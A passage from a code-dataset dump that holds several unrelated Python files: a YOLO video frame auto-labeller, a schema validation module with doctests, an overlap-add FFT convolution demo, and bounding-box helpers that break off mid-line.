video_name_ext = os.path.basename(file_path)\r\n if not os.path.exists(file_path):\r\n print(' Converting video to individual frames...')\r\n os.makedirs(file_path)\r\n\r\n\r\n confThreshold = 0.1 #Confidence threshold\r\n nmsThreshold = 0.1 #Non-maximum suppression threshold\r\n\r\n inpWidth = inpHeight = 416 #Height of network's input imageai #Width of network's input image\r\n OUTPUT_DIR =\"output\"\r\n INPUT_DIR = \"input\"\r\n classesFile = \"/home/facit/Desktop/Models/yolo.names\"\r\n classes = None\r\n modelConfiguration = \"/home/facit/Desktop/WeightsFilesBackup/allModel.cfg\"\r\n modelWeights = \"/home/facit/Desktop/WeightsFilesBackup/PeopleBest.weights\"\r\n\r\n annotation_formats = {'PASCAL_VOC' : '.xml', 'YOLO_darknet' : '.txt'}\r\n annotation_formats = {'PASCAL_VOC' : '.xml'}\r\n\r\n with open(classesFile, 'rt') as f:\r\n class_ = f.read().rstrip('\\n').split('\\n')\r\n print(class_)\r\n \r\n\r\n net = cv2.dnn.readNetFromDarknet(modelConfiguration, modelWeights)\r\n net.setPreferableBackend(cv2.dnn.DNN_BACKEND_CUDA)\r\n net.setPreferableTarget(cv2.dnn.DNN_TARGET_CUDA)\r\n\r\n execution_path = os.getcwd()\r\n cap = cv2.VideoCapture(video_name)\r\n frame_width = int(cap.get(3))\r\n frame_height = int(cap.get(4))\r\n video_last_name = video_name.split(\"\\\\\")\r\n fps = cap.get(cv2.CAP_PROP_FPS)\r\n codec=cap.get(cv2.CAP_PROP_FOURCC)\r\n out = cv2.VideoWriter(output_video,cv2.VideoWriter_fourcc('M','J','P','G'), fps,(frame_width, frame_height))\r\n\r\n # Check if camera opened successfully\r\n if (cap.isOpened()== False): \r\n print(\"Error opening video stream or file\")\r\n\r\n ret, frame = cap.read()\r\n # Select ROI\r\n cv2.namedWindow(\"frame\", cv2.WND_PROP_FULLSCREEN)\r\n\r\n frameHeight = frame_height\r\n frameWidth = frame_width\r\n i=0\r\n desired_img_format = '.jpg'\r\n inc = fps\r\n start_frame_number=0\r\n # cv2.setUseOptimized(False)\r\n while(cap.isOpened()):\r\n # Capture frame-by-frame\r\n \r\n ret, frame = cap.read()\r\n \r\n rects = []\r\n classes=[]\r\n \r\n if ret == True:\r\n cap.set(cv2.CAP_PROP_POS_FRAMES, start_frame_number)\r\n start_frame_number = start_frame_number +inc\r\n\r\n # frame = cv2.resize(frame,(int(inpWidth),int(inpHeight)))\r\n start_time = time.time()\r\n blob = cv2.dnn.blobFromImage(frame, 1/255, (inpWidth, inpHeight), [0,0,0], 1, crop=False)\r\n # Sets the input to the network\r\n net.setInput(blob)\r\n # Runs the forward pass to get output of the output layers\r\n outs = net.forward(getOutputsNames(net))\r\n frame_name = '{}_{}{}'.format(video_name_ext, i, desired_img_format)\r\n frame_path = os.path.join(file_path, frame_name)\r\n cv2.imwrite(frame_path, frame)\r\n # Remove the bounding boxes with low confidence\r\n rects,classes =postprocess(frame, outs)\r\n i+=1\r\n annotation_paths = get_annotation_paths(frame_path, annotation_formats)\r\n \r\n abs_path = os.path.abspath(frame_path)\r\n folder_name = os.path.dirname(frame_path)\r\n image_name = os.path.basename(frame_path)\r\n img_height, img_width, depth = (str(number) for number in frame.shape)\r\n\r\n if len(classes)>0:\r\n for ann_path in annotation_paths:\r\n if not os.path.isfile(ann_path):\r\n create_PASCAL_VOC_xml(ann_path, abs_path, folder_name, image_name, img_height, img_width, depth)\r\n\r\n\r\n for box, classId in zip(rects, classes):\r\n save_bounding_box(annotation_paths, classId, (int(box[0]), int(box[1])),(int(box[0]) + int(box[2]), int(box[1]) + int(box[3])), frameWidth, frameHeight)\r\n\r\n cv2.circle(frame, (0,0) , 4,(255,255,255), -1)\r\n end_time = 
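The capture loop above samples roughly one frame per second by seeking with `cap.set(cv2.CAP_PROP_POS_FRAMES, ...)` after every read. Seeks can be slow or inexact with some codecs; reading sequentially and keeping every fps-th frame is a common alternative (a sketch with a hypothetical `handle_frame` callback):

import cv2

def sample_one_frame_per_second(video_path, handle_frame):
    # Read every frame in order and hand one per second of video to the
    # callback, instead of seeking between reads.
    cap = cv2.VideoCapture(video_path)
    step = max(int(cap.get(cv2.CAP_PROP_FPS)), 1)
    idx = 0
    while True:
        ret, frame = cap.read()
        if not ret:
            break
        if idx % step == 0:
            handle_frame(frame)  # hypothetical per-frame handler
        idx += 1
    cap.release()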
time.time()\r\n # cv2.putText(frame, '{:.2f}ms'.format((end_time - start_time) * 1000), (40, 40), 0,fontScale=1, color=(0, 255, 0), thickness=2)\r\n print(\"FPS : {:.2f}ms\".format((end_time - start_time)* 1000))\r\n cv2.imshow(\"frame\",frame)\r\n out.write(frame)\r\n # Press Q on keyboard to exit\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n # Break the loop\r\n else: \r\n break\r\n\r\n\r\n # When everything done, release the video capture object\r\n cap.release()\r\n # out.release() \r\n cv2.destroyAllWindows()\r\n\r\n ending_time = time.time()\r\n print(\"FPS end : {:.2f}ms\".format((ending_time - starting_time)* 1000))\r\n\r\n\r\n\r\n# if __name__ == \"__main__\":\r\n \r\n\r\n\r\n\r\n# location=\"/home/facit/Downloads/Fertig/Fertig/\"\r\n# folder=location+\"*.mp4\"\r\n# # x-special/nautilus-clipboard\r\n# # file:///home/facit/Desktop/PythonLabelImage/newVideo/Mazz%20Check%20this%20video\r\n# # file = \"/home/facit/Desktop/PythonLabelImage/newVideo/video\"\r\n# # main(video_name=file)\r\n \r\n# print(folder)\r\n# # videofiles =[]\r\n# files = glob.glob(folder)\r\n# for file in files:\r\n# if os.path.isfile(file): \r\n# # videofiles.append(file)\r\n# print(file)\r\n# main(video_name=file)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n \r\n parser = argparse.ArgumentParser(description='Object Detection using YOLO in OPENCV')\r\n parser.add_argument('--image', help='Path to image file.')\r\n parser.add_argument('--video', help='Path to video file.')\r\n parser.add_argument('--folder', help='Path to video file.')\r\n fileTypes =('*.avi', '*.mp4','*.webm')\r\n args = parser.parse_args()\r\n if (args.video):\r\n # Open the video file\r\n if not os.path.isfile(args.video):\r\n print(\"Input video file \", args.video, \" doesn't exist\")\r\n sys.exit(1)\r\n video_name = args.video\r\n outputFile = video_name[:-4]+'resthead_output.avi'\r\n main(video_name=video_name,output_video= outputFile)\r\n\r\n\r\n if (args.folder):\r\n if os.path.exists(args.folder): \r\n files = []\r\n output_folder= join(args.folder, 'new')\r\n if not os.path.exists(output_folder):\r\n os.makedirs(output_folder)\r\n for ext in fileTypes:\r\n# import os\r\n files.extend(glob(join(args.folder, ext)))\r\n for filepath in files:\r\n print(filepath) \r\n if os.path.isfile(filepath):\r\n output_file = os.path.basename(filepath)\r\n # outputFile = video_name[:-4]+'_output.avi'\r\n filename = os.path.basename(filepath)\r\n outfile = filename[:-4]+'_output.avi'\r\n output_file = join(output_folder, outfile)\r\n print(\"Input video file \",filepath)\r\n print(output_file)\r\n main(video_name=filepath,output_video=output_file)\r\n","sub_path":"pyautoLabelImg.py","file_name":"pyautoLabelImg.py","file_ext":"py","file_size_in_byte":16845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"155388165","text":"import sys\nif sys.version < '3': # pragma: no cover\n unicode_type = unicode\n bytes_type = str\nelse: # pragma: no cover\n bytes_type = bytes\n unicode_type = str\n basestring = str\n\nimport vertigo as vg\n\nfrom .invalid import Invalid, InvalidAggregator\nfrom .base import Marker, traverse, validate, dictify, undictify, to_typegraph\nfrom .schema import Schema\n\nclass SchemaMapping(Schema):\n '''Marker for structured dicts.\n\n The children of this node in the typegraph indicate the types of the keyed\n attributes to traverse.\n\n >>> from collections import OrderedDict\n >>> from datetime import date\n >>> from . 
import Int, Date\n >>> G = vg.PlainGraphNode\n\n >>> bday = date(1985, 9, 16)\n >>> schema = G(SchemaMapping(), [(\"age\",G(Int())), (\"birthday\",G(Date()))])\n >>> def mk(age, birthday):\n ... return OrderedDict([('age', age), ('birthday', birthday)])\n >>> print(vg.ascii_tree(traverse(schema, mk(age=27, birthday=bday))))\n root: OrderedDict([('age', 27), ('birthday', datetime.date(1985, 9, 16))])\n +--age: 27\n +--birthday: datetime.date(1985, 9, 16)\n\n >>> validate(schema, mk(age=27, birthday=bday))\n >>> validate(schema, mk(age=27.1, birthday=\"not a date\"))\n Traceback (most recent call last):\n ...\n Invalid: age: [type_error], birthday: [type_error]\n\n >>> cstruct = dictify(schema, mk(age=27, birthday=bday))\n >>> cstruct == mk(age=27, birthday=u'1985-09-16')\n True\n >>> undictify(schema, cstruct) == mk(age=27, birthday=bday)\n True\n\n The 'extra_field_policy' flag should be 'save', 'discard', or 'error'. This\n controls what happens on undictifiance when unexpected fields are present.\n\n 'save': un/dictify preserves extra keys; validate ignores them\n\n >>> schema = G.build(dict(_self=SchemaMapping('save'), age=Int()))\n >>> v = undictify(schema, {'age':27, 'color':'blue'})\n >>> v == {'age': 27, 'color': 'blue'}\n True\n >>> validate(schema, v)\n >>> v = dictify(schema, {'age':27, 'color':'blue'})\n >>> v == {'age': 27, 'color': 'blue'}\n True\n\n 'discard': un/dictify discards extra keys; validate complains about them\n\n >>> schema = G.build(dict(_self=SchemaMapping('discard'), age=Int()))\n >>> v = undictify(schema, {'age':27, 'color':'blue'})\n >>> v == {'age': 27}\n True\n >>> validate(schema, v)\n >>> validate(schema, {'age':27, 'color':'blue'})\n Traceback (most recent call last):\n ...\n Invalid: unexpected_fields - {'keys': set(['color'])}\n >>> v = dictify(schema, {'age':27, 'color':'blue'})\n >>> v == {'age': 27}\n True\n\n 'error': undictify and validate complain; dictify discards\n\n >>> schema = G.build(dict(_self=SchemaMapping('error'), age=Int()))\n >>> v = undictify(schema, {'age':27, 'color':'blue'})\n Traceback (most recent call last):\n ...\n Invalid: unexpected_fields - {'keys': set(['color'])}\n >>> validate(schema, {'age':27, 'color':'blue'})\n Traceback (most recent call last):\n ...\n Invalid: unexpected_fields - {'keys': set(['color'])}\n >>> v = dictify(schema, {'age':27, 'color':'blue'})\n >>> v == {'age': 27}\n True\n\n >>> validate(schema, 12)\n Traceback (most recent call last):\n ...\n Invalid: type_error - Expected dict, got \n '''\n def __init__(self, extra_field_policy=\"discard\"):\n super(SchemaMapping, self).__init__()\n self.extra_field_policy=extra_field_policy\n\n@validate.when(SchemaMapping)\ndef validate_mapping(dispgraph, value, **kwargs):\n if not isinstance(value, dict):\n raise Invalid(\"type_error\", \"Expected dict, got {}\".format(type(value)))\n marker = dispgraph.marker\n error_agg = InvalidAggregator(autoraise = kwargs.get('fail_early', False))\n with error_agg.checking():\n dispgraph.super(SchemaMapping)(value, **kwargs)\n if marker.extra_field_policy in ['error', 'discard']:\n extra_keys = set(value.keys()) - set(dispgraph.key_iter())\n if extra_keys:\n error_agg.own_error(Invalid('unexpected_fields', keys=extra_keys))\n error_agg.raise_if_any()\n\n@dictify.when(SchemaMapping)\ndef dictify_mapping(dispgraph, value, **kwargs):\n marker = dispgraph.marker\n result = dispgraph.super(SchemaMapping)(value, **kwargs)\n if marker.extra_field_policy == 'save':\n for key in set(value.keys()) - set(dispgraph.key_iter()):\n 
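The `@validate.when(SchemaMapping)` / `dispgraph.super(SchemaMapping)` pair above is the extension point of this dispatch scheme: a hook is registered per marker class and can delegate to the parent marker's behaviour before adding its own checks. A sketch of a custom marker using the same pattern (the `LowercaseMapping` marker is hypothetical, not part of this module):

class LowercaseMapping(SchemaMapping):
    '''Hypothetical marker: a structured dict whose string keys must be lowercase.'''

@validate.when(LowercaseMapping)
def validate_lowercase_mapping(dispgraph, value, **kwargs):
    # Run SchemaMapping's structural checks first, then add one more.
    dispgraph.super(LowercaseMapping)(value, **kwargs)
    bad_keys = [k for k in value if isinstance(k, str) and k != k.lower()]
    if bad_keys:
        raise Invalid('value_error/uppercase_keys', keys=bad_keys)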
result[key] = value[key]\n return result\n\n\n@undictify.when(SchemaMapping)\ndef undictify_mapping(dispgraph, value, **kwargs):\n marker = dispgraph.marker\n error_agg = InvalidAggregator(autoraise = kwargs.get('fail_early', False))\n with error_agg.checking():\n result = dispgraph.super(SchemaMapping)(value, **kwargs)\n extra_keys = set(value.keys()) - set(dispgraph.key_iter())\n if marker.extra_field_policy == 'error' and extra_keys:\n error_agg.own_error(Invalid('unexpected_fields', keys=extra_keys))\n elif marker.extra_field_policy == 'save':\n for key in extra_keys:\n result[key] = value[key]\n error_agg.raise_if_any()\n return result\n\n\nclass StrMapping(Marker):\n '''Marker for dicts with string keys and homogenous values.\n\n The sub child in the typegraph determines the types of the mapping's values.\n\n >>> from collections import OrderedDict\n >>> from vertigo import PlainGraphNode as G\n >>> from . import Int, Date, List\n >>> from datetime import date\n >>> StringToNumList = StrMapping().of(List().of(Int()))\n >>> example = OrderedDict([(\"foo\",[1,2,3,4]), (\"bar\",[6,12,-4])])\n >>> print(vg.ascii_tree(traverse(StringToNumList, example), sort=True))\n root: OrderedDict([('foo', [1, 2, 3, 4]), ('bar', [6, 12, -4])])\n +--bar: [6, 12, -4]\n | +--0: 6\n | +--1: 12\n | +--2: -4\n +--foo: [1, 2, 3, 4]\n +--0: 1\n +--1: 2\n +--2: 3\n +--3: 4\n >>> cstruct = dictify(StringToNumList, example)\n >>> cstruct == {'foo':[1,2,3,4], 'bar':[6,12,-4]}\n True\n >>> undictify(StringToNumList, cstruct) == example\n True\n >>> undictify(StringToNumList, None)\n Traceback (most recent call last):\n ...\n Invalid: type_error - Expected dict, got \n >>> undictify(StringToNumList, {12:[1,2,3]})\n Traceback (most recent call last):\n ...\n Invalid: value_error/bad_keys - Bad keys - {'keys': [12]}\n >>> validate(StringToNumList, example)\n >>> validate(StringToNumList, {'foo':[1,\"hi\",3]})\n Traceback (most recent call last):\n ...\n Invalid: foo: [1: [type_error]]\n >>> validate(StringToNumList, {12:[1,2,3]})\n Traceback (most recent call last):\n ...\n Invalid: value_error/bad_keys - Bad keys - {'keys': [12]}\n >>> validate(StringToNumList, 12)\n Traceback (most recent call last):\n ...\n Invalid: type_error - Expected dict, got \n\n >>> try:\n ... undictify(StringToNumList, OrderedDict([\n ... ('hello', None),\n ... ]))\n ... except Invalid as e:\n ... print(vg.ascii_tree(e.as_graph(), sort=True))\n root: []\n +--hello: [SingleInvalid('type_error',)]\n '''\n def of(self, sub):\n return vg.PlainGraphNode(self, sub = to_typegraph(sub))\n\n@traverse.when(StrMapping)\ndef traverse_strmap(dispgraph, value, zipgraph=None, **kwargs):\n edges = []\n valgraph = dispgraph['sub']\n valzip = zipgraph['sub'] if zipgraph else None\n for key, val in value.items():\n edges.append((key, valgraph(val, valzip, **kwargs)))\n v = value\n if zipgraph:\n v = (v, zipgraph.value)\n return vg.PlainGraphNode(v, edges)\n\n@undictify.when(StrMapping)\ndef undictify_strmap(dispgraph, value, **kwargs):\n if not isinstance(value, dict):\n raise Invalid(\"type_error\", \"Expected dict, got {}\".format(type(value)))\n # If fail_early is True, then gather all errors from this and its\n # children. 
Otherwise, just raise the first error we encounter.\n error_agg = InvalidAggregator(autoraise = kwargs.get('fail_early', False))\n data = {}\n bad_keys = []\n for key, val in value.items():\n if not isinstance(key, basestring):\n bad_keys.append(key)\n continue\n with error_agg.checking_sub(key):\n val = dispgraph['sub'](val, **kwargs)\n data[key] = val\n if bad_keys:\n with error_agg.checking():\n raise Invalid(\"value_error/bad_keys\", \"Bad keys\", keys=bad_keys)\n error_agg.raise_if_any()\n return data\n\n@dictify.when(StrMapping)\ndef dictify_strmap(dispgraph, value, **kwargs):\n sub = dispgraph['sub']\n return {key:sub(val, **kwargs) for (key, val) in value.items()}\n\n@validate.when(StrMapping)\ndef validate_strmap(dispgraph, value, **kwargs):\n if not isinstance(value, dict):\n raise Invalid(\"type_error\", \"Expected dict, got {}\".format(type(value)))\n error_agg = InvalidAggregator(autoraise = kwargs.get('fail_early', False))\n bad_keys = []\n for key, val in value.items():\n if not isinstance(key, basestring):\n bad_keys.append(key)\n continue\n with error_agg.checking_sub(key):\n dispgraph['sub'](val, **kwargs)\n if bad_keys:\n with error_agg.checking():\n raise Invalid(\"value_error/bad_keys\", \"Bad keys\", keys=bad_keys)\n error_agg.raise_if_any()\n\nclass UniMapping(Marker):\n '''Marker for dicts with homogenous keys and homogenous values.\n\n The key and val children in the typegraph determine the types of the\n mapping's keys and values, respectively.\n\n >>> from collections import OrderedDict\n >>> from vertigo import PlainGraphNode as G\n >>> from . import Int, Date, List\n >>> from datetime import date\n >>> DateToNumList = G.build(dict(\n ... _self=UniMapping(),\n ... key=Date(),\n ... val=dict(_self=List(), sub=Int()))\n ... )\n >>> d1, d2 = date(1985, 9, 16), date(1980, 3, 17)\n >>> example = OrderedDict([(d1,[1,2,3,4]), (d2,[6,12,-4])])\n >>> print(vg.ascii_tree(traverse(DateToNumList, example), sort=True))\n root: OrderedDict([(datetime.date(1985, 9, 16), [1, 2, 3, 4]), (datetime.date(1980, 3, 17), [6, 12, -4])])\n +--key_0: datetime.date(1985, 9, 16)\n +--key_1: datetime.date(1980, 3, 17)\n +--value_0: [1, 2, 3, 4]\n | +--0: 1\n | +--1: 2\n | +--2: 3\n | +--3: 4\n +--value_1: [6, 12, -4]\n +--0: 6\n +--1: 12\n +--2: -4\n >>> cstruct = dictify(DateToNumList, example)\n >>> cstruct == {u'1985-09-16':[1,2,3,4], '1980-03-17':[6,12,-4]}\n True\n >>> undictify(DateToNumList, cstruct) == example\n True\n >>> undictify(DateToNumList, None)\n Traceback (most recent call last):\n ...\n Invalid: type_error - Expected dict, got \n >>> validate(DateToNumList, example)\n >>> validate(DateToNumList, {\"not a date\":[1,2,3]})\n Traceback (most recent call last):\n ...\n Invalid: key_0: [type_error]\n >>> validate(DateToNumList, {d1:[1,\"hi\",3]})\n Traceback (most recent call last):\n ...\n Invalid: value_0: [1: [type_error]]\n >>> validate(DateToNumList, 12)\n Traceback (most recent call last):\n ...\n Invalid: type_error - Expected dict, got \n\n >>> try:\n ... undictify(DateToNumList, OrderedDict([\n ... ('1985-09-16', [1, 'hi']),\n ... ('hello', None),\n ... ]))\n ... except Invalid as e:\n ... 
print(vg.ascii_tree(e.as_graph(), sort=True))\n root: []\n +--key_1: [SingleInvalid('bad_format',)]\n +--value_1: [SingleInvalid('type_error',)]\n\n Caveat: Note that if the value passed in is not an OrderedDict, then there's\n no guarantee of the numerical order of the errors or of the traversal -\n '''\n def of(self, key, val):\n key, val = to_typegraph(key), to_typegraph(val)\n return vg.PlainGraphNode(self, key=key, val=val)\n\n@traverse.when(UniMapping)\ndef traverse_unimap(dispgraph, value, zipgraph=None, **kwargs):\n edges = []\n keygraph = dispgraph['key']\n valgraph = dispgraph['val']\n keyzip = zipgraph['key'] if zipgraph else None\n valzip = zipgraph['val'] if zipgraph else None\n for i, (key, val) in enumerate(value.items()):\n edges.append(('key_{}'.format(i), keygraph(key, keyzip, **kwargs)))\n edges.append(('value_{}'.format(i), valgraph(val, valzip, **kwargs)))\n v = value\n if zipgraph:\n v = (v, zipgraph.value)\n return vg.PlainGraphNode(v, edges)\n\n\n@undictify.when(UniMapping)\ndef undictify_unimap(dispgraph, value, **kwargs):\n if not isinstance(value, dict):\n raise Invalid(\"type_error\", \"Expected dict, got {}\".format(type(value)))\n # If fail_early is True, then gather all errors from this and its\n # children. Otherwise, just raise the first error we encounter.\n error_agg = InvalidAggregator(autoraise = kwargs.get('fail_early', False))\n data = {}\n for i, (key, val) in enumerate(value.items()):\n with error_agg.checking_sub('key_{}'.format(i)):\n key = dispgraph['key'](key, **kwargs)\n with error_agg.checking_sub('value_{}'.format(i)):\n val = dispgraph['val'](val, **kwargs)\n data[key] = val\n error_agg.raise_if_any()\n return data\n\n@dictify.when(UniMapping)\ndef dictify_unimap(dispgraph, value, **kwargs):\n kdfy = lambda x: dispgraph['key'](x, **kwargs)\n vdfy = lambda x: dispgraph['val'](x, **kwargs)\n return {kdfy(key):vdfy(val) for (key, val) in value.items()}\n\n@validate.when(UniMapping)\ndef validate_unimap(dispgraph, value, **kwargs):\n if not isinstance(value, dict):\n raise Invalid(\"type_error\", \"Expected dict, got {}\".format(type(value)))\n error_agg = InvalidAggregator(autoraise = kwargs.get('fail_early', False))\n for i, (key, val) in enumerate(value.items()):\n with error_agg.checking_sub('key_{}'.format(i)):\n dispgraph['key'](key, **kwargs)\n with error_agg.checking_sub('value_{}'.format(i)):\n dispgraph['val'](val, **kwargs)\n error_agg.raise_if_any()\n\n\n\nif __name__ == '__main__': # pragma: no cover\n import doctest\n doctest.testmod()\n","sub_path":"travesty/mapping.py","file_name":"mapping.py","file_ext":"py","file_size_in_byte":14066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"398475955","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.signal as sc\nfrom matplotlib.animation import FuncAnimation\nfrom buttons import buttonOnFigure\n#--------------------------------------\nfig = plt.figure()\nfs = 20\nN = 80\nsignalFrec = 0.4\nfirData, = np.load(\"6_clase/low_pass_1k.npy\").astype(float)\nfirData = np.insert(firData,0,firData[-1])\nM = len(firData)\nfirExtendedData = np.concatenate((firData,np.zeros(N-1)))\nimpar = ((N+M-1)%2)\n#--------------------------------------\ndef x(f,n):\n return np.sin(2*np.pi*f*n)+np.sin(2*np.pi*5*n)\n\nk=10\ntData=np.linspace(0,(k*N+M-1)/fs,k*N+M-1,endpoint=False)\nxData=x(signalFrec,tData[:k*N])\nsegment=0\n#--------------------------------------\nsignalAxe = fig.add_subplot(4,1,1)\nsignalLn, = 
plt.plot(tData[:k*N],xData,'b-o',label=\"signal\")\nsignalAxe.legend()\nsignalAxe.grid(True)\nsignalAxe.set_xlim(0,(k*N-1)/fs)\nsignalAxe.set_ylim(np.min(xData)-0.2,np.max(xData)+0.2)\nconvSignalZoneLn = signalAxe.fill_between([0,0],10,-10,facecolor=\"yellow\",alpha=0.5)\n\ntSegmentData=np.linspace(0,(N+M-1)/fs,N+M-1,endpoint=False)\nfData=np.concatenate((np.linspace(-fs/2,0,(N+M-1)//2,endpoint=False),\\\n np.linspace(0,fs/2,(N+M-1)//2+impar,endpoint=False)))\nsegmentData=np.zeros(N+M-1)\n\n\nfftData=np.fft.fft(xData)\ncircularfftData=np.concatenate((fftData[len(fftData)//2+impar:],fftData[0:len(fftData)//2+impar]))\nsegmentFftAxe = fig.add_subplot(4,2,3)\nsegmentFftLn, = plt.plot([],[],'r-o',label=\"segment FFT\")\nsegmentFftAxe.legend()\nsegmentFftAxe.grid(True)\nsegmentFftAxe.set_xlim(-fs/2,fs/2)\nsegmentFftAxe.set_ylim(np.min(np.abs(fftData)),50)#np.max(fftData))\n\nHData=np.fft.fft(firExtendedData)\ncircularHData=np.concatenate((HData[len(HData)//2+impar:],HData[0:len(HData)//2+impar]))\nHAxe = fig.add_subplot(4,2,5)\nHLn, = plt.plot(fData,np.abs(circularHData),'b-o',label=\"H\")\nHAxe.legend()\nHAxe.grid(True)\nHAxe.set_xlim(-fs/2,fs/2)\nHAxe.set_ylim(np.min(np.abs(HData)),np.max(np.abs(HData)))\n\n\n\nYAxe = fig.add_subplot(4,2,4)\nYLn, = plt.plot([],[],'b-o',label=\"segment Y\")\nYAxe.legend()\nYAxe.grid(True)\nYAxe.set_xlim(-fs/2,fs/2)\nYAxe.set_ylim(np.min(np.abs(fftData)),50)#np.max(fftData))\n\nifftAxe = fig.add_subplot(4,2,6)\nifftLn, = plt.plot([],[],'b-o',label=\"segment ifft\")\nifftAxe.legend()\nifftAxe.grid(True)\nifftAxe.set_xlim(0,(N+M-1)/fs)\nifftAxe.set_ylim(np.min(xData),np.max(xData))\n\nconvAxe = fig.add_subplot(4,1,4)\nconvolveData = np.convolve(xData,firData)\nconvLn, = plt.plot(tData,convolveData,'b-',label = \"conv\")\nrealtimeConvLn, = plt.plot([],[],'g-o')\nconvAxe.legend()\nconvAxe.grid(True)\nconvAxe.set_xlim(0,(k*N+M-2)/fs)\n#--------------------------------------\nrealtimeConv=np.zeros(k*N+M-1)\ndef init():\n global yData,realtimeConv\n# realtimeConv=np.zeros(N+M-1)\n return YLn,realtimeConvLn,convSignalZoneLn,segmentFftLn,ifftLn\n\n\ndef update(i):\n global yData,b,realtimeConv,segment\n segment=i\n\n segmentData[:N]=x(signalFrec,tData[segment*N:(segment+1)*N])\n\n segmentFftData=np.fft.fft(segmentData)\n circularSegmentFftData=np.concatenate((segmentFftData[len(segmentFftData)//2+impar:],segmentFftData[0:len(segmentFftData)//2+impar]))\n segmentFftLn.set_data(fData,np.abs(circularSegmentFftData))\n\n YData=segmentFftData*HData\n YLn.set_data(fData,np.abs(circularSegmentFftData*circularHData))\n\n ifftData=np.fft.ifft(YData)\n ifftLn.set_data(tSegmentData,np.real(ifftData))\n\n realtimeConv[segment*N:segment*N+N+M-1]+=np.real(ifftData)\n realtimeConvLn.set_data(tData,realtimeConv)\n\n convSignalZoneLn = signalAxe.fill_between([tData[segment*N],tData[(segment+1)*N-1]],10,-10,facecolor=\"yellow\",alpha=0.5)\n return YLn,realtimeConvLn,convSignalZoneLn,segmentFftLn,ifftLn\n\nani=FuncAnimation(fig,update,k,init,interval=2000 ,blit=True,repeat=False)\nplt.get_current_fig_manager().window.showMaximized()\nb=buttonOnFigure(fig,ani)\nplt.show()\n","sub_path":"clases/6_clase/overlap_add2.py","file_name":"overlap_add2.py","file_ext":"py","file_size_in_byte":3937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"165124631","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nimport numpy as np\n# import pyximport; pyximport.install()\n# import 
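The overlap_add2.py record above animates block-wise FFT convolution. Stripped of the plotting, the overlap-add method it demonstrates fits in a few lines (the test signal and filter below are made up for the sanity check):

import numpy as np

def overlap_add(x, h, block_len):
    # Split x into blocks, FFT-convolve each block with the FIR filter h,
    # and accumulate the overlapping tails into the output.
    n_fft = block_len + len(h) - 1
    H = np.fft.fft(h, n_fft)
    y = np.zeros(len(x) + len(h) - 1)
    for start in range(0, len(x), block_len):
        seg = np.real(np.fft.ifft(np.fft.fft(x[start:start + block_len], n_fft) * H))
        end = min(start + n_fft, len(y))
        y[start:end] += seg[:end - start]
    return y

x = np.random.randn(800)   # hypothetical test signal (k*N samples in the demo)
h = np.ones(32) / 32       # hypothetical 32-tap FIR filter
assert np.allclose(overlap_add(x, h, 80), np.convolve(x, h))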
cython_bbox\n# import cython_nms\nfrom trident.backend.common import *\n\n_session=get_session()\n_backend=_session.backend\n_image_backend=_session.image_backend\n\nif _image_backend=='opencv':\n from trident.backend.opencv_backend import *\nelse:\n from trident.backend.pillow_backend import *\n\nif _backend=='pytorch':\n from trident.backend.pytorch_ops import *\nelse:\n from trident.backend.tensorflow_ops import *\n\n\n\n__all__ = ['nms', 'xywh2xyxy', 'xyxy2xywh','box_area','box_iou','bbox_iou','bbox_diou','box_giou','bbox_giou','bbox_giou_numpy','plot_one_box','convert_to_square']\n\n\ndef plot_one_box(box, img, color=None, label=None, line_thickness=None):\n import cv2\n # Plots one bounding box on image img\n tl = line_thickness if line_thickness is not None else round(0.15*(box[2]-box[0]) )# round(0.002 * (img.shape[0] + img.shape[1]) / 2) + 1 # line/font thickness\n c1, c2 = (int(box[0]), int(box[1])), (int(box[2]), int(box[3]))\n cv2.rectangle(img, c1, c2, color=color, thickness=tl)\n if label:\n tf = max(tl - 1, 1) # font thickness\n t_size = cv2.getTextSize(label, 0, fontScale=tl / 3, thickness=tf)[0]\n c2 = c1[0] + t_size[0], c1[1] - t_size[1] - 3\n cv2.rectangle(img, c1, c2, color, -1) # filled\n cv2.putText(img, label, (c1[0], c1[1] - 2), 0, tl / 3, [225, 255, 255], thickness=tf, lineType=cv2.LINE_AA)\n return img\n\ndef xywh2xyxy(boxes,image_size=None):\n \"\"\"\n Args:\n boxes (tensor or ndarray):\n boxes with xywh (centerx,centery,width, height) format\n boxes shape should be [n,m] m>=4\n image_size (size): (height, width)\n Returns\n xyxy (x1,y1,x2,y2)\n \"\"\"\n \"\"\"Convert [x1 y1 w h] box format to [x1 y1 x2 y2] format.\"\"\"\n if isinstance(boxes, (list, tuple)):\n # Single box given as a list of coordinates\n assert len(boxes) == 4\n cx, cy ,w,h= boxes[0], boxes[1], boxes[2], boxes[3]\n x1=cx-0.5*w\n y1=cy-0.5*h\n x2 = cx+0.5*w\n y2=cy+0.5*h\n if len(boxes)>4:\n boxlist=[x1, y1, x2, y2]\n boxlist.extend(boxes[4:])\n return np.array(boxlist)\n return np.array([x1, y1, x2, y2])\n elif isinstance(boxes, np.ndarray):\n class_info = None\n if boxes.shape[-1] >4:\n class_info = boxes[:, 4:]\n boxes = boxes[:, :4]\n # Multiple boxes given as a 2D ndarray\n boxes[:, 0:2] =boxes[:, 0:2]- boxes[:, 2:4] / 2\n boxes[:, 2:4] =boxes[:, 2:4] + boxes[:, 0:2]\n\n height, width = np.inf, np.inf\n if image_size is not None:\n height, width = image_size\n boxes[:, :4] = np.round(boxes[:, :4], 0)\n boxes[:, 0] = np.clip(boxes[:, 0], a_min=0, a_max=width)\n boxes[:, 1] = np.clip(boxes[:, 1], a_min=0, a_max=height)\n boxes[:, 2] = np.clip(boxes[:, 2], a_min=0, a_max=width)\n boxes[:, 3] = np.clip(boxes[:, 3], a_min=0, a_max=height)\n if class_info is not None:\n boxes = np.concatenate([boxes, class_info], axis=-1)\n return boxes\n elif is_tensor(boxes) :\n class_info = None\n if boxes.shape[-1] >4:\n class_info = boxes[:, 4:]\n boxes = boxes[:, :4]\n x1y1= clip(round(boxes[:, 0:2] -boxes[:, 2:4] /2,0),0)\n x2y2=clip(round(x1y1+ boxes[:, 